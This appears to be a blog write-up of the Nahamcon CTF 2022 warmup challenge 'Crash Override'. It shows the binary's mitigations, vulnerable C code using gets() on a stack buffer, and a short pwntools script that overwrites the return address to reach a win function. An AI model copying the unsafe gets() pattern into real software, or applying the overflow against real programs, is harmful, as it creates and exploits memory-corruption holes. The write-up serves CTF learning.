Aynakeya's Blog

Kill My Emotion

[Warmup] Crash Override [Nahamcon CTF 2022]

0x0 Introduction

Author: @M_alpha#3534

Remember, hacking is more than just a crime. It's a survival trait.

files: crash_override, crash_override.c

0x1 Mitigation

1
2
3
4
5
6
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      PIE enabled
RWX:      Has RWX segments

0x2 Vuln

very simple buffer overflow

1
2
3
4
5
6
7
8
9
void win(int sig) {
    // print flag
}
int main(void) {
    char buffer[2048];
    gets(buffer);

    return 0;
}

0x3 Exploit

1
2
3
4
5
6
7
8
io = start()
wait_for_debugger(io)

io.sendlineafter(b"!\n",flat({
    0x800+0x8:exe.sym["win"]
}))

io.interactive()

0x2 Flag

None

0%